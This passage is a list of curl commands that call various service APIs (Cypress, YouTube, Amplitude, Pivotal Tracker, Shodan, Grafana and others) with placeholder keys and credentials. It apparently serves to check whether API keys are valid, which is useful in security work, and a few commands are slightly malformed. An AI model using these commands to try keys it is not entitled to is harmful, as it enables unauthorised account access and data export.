"},\"parallel\":null,\"ciBuildId\":null,\"projectId\":\"{projectId}\",\"recordKey\":\"{recordKey}\",\"specPattern\":null,\"tags\":[\"\"]}' \\ $'https://api.cypress.io/runs'\ \ Copy\ \ curl -iLk 'https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={KEY_HERE}'\ \ Copy\ \ curl "api_endpoint_here" -H "x-api-key: your_api_key"\ \ Copy\ \ curl -H "Api_Key: {API_KEY}" https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty\ \ Copy\ \ curl -u API_Key:Secret_Key 'https://amplitude.com/api/2/export?start=20200201T5&end=20210203T20' >> yourfilename.zip\ \ Copy\ \ curl -sX GET "https://api.appcenter.ms/v0.1/apps" \\ -H "Content-Type: application/json" \\ -H "X-Api-Token: {your_api_token}"\ \ Copy\ \ curl -sX GET "https://api.appcenter.ms/v0.1/apps/{owner.name}/{name}/releases/latest" \\ -H "Content-Type: application/json" \\ -H "X-Api-Token: {your_api_token}"\ \ Copy\ \ curl -X POST \\ 'https://api.weglot.com/translate?api_key=my_api_key' \\ -H 'Content-Type: application/json' \\ -d '{ \ "l_from":"en",\ "l_to":"fr",\ "request_url":"https://www.website.com/",\ "words":[ \ {"w":"This is a blue car", "t": 1},\ {"w":"This is a black car", "t": 1}\ ]\ }'\ \ Copy\ \ curl -X GET -H "X-TrackerToken: $TOKEN" "https://www.pivotaltracker.com/services/v5/me?fields=%3Adefault"\ \ Copy\ \ curl -s -X GET --user 'USER:PASSWORD' "https://www.pivotaltracker.com/services/v5/me -o pivotaltracker.json"\ jq --raw-output .api_token pivotaltracker.json\ \ Copy\ \ curl -XPOST -H "Content-type: application/x-www-form-urlencoded" -d 'grant_type=client_credentials&client_id=&client_secret=' 'https://www.linkedin.com/oauth/v2/accessToken'\ \ \ Copy\ \ curl -X POST https://api.helpscout.net/v2/oauth2/token \\ --data "grant_type=client_credentials" \\ --data "client_id={application_id}" \\ --data "client_secret={application_secret}"\ \ Copy\ \ curl "https://api.shodan.io/shodan/host/8.8.8.8?key=TOKEN_HERE"\ \ Copy\ \ curl 'https://which-cpv-api.bazaarvoice.com/clientInfo?conversationspasskey=' --insecure \ \ \ Copy\ \ curl -s -H "Authorization: Bearer your-api-key" http://your-grafana-server-url.com/api/user\ \ Copy\ \ curl -u username:password http://your-grafana-server-url.com/api/user ---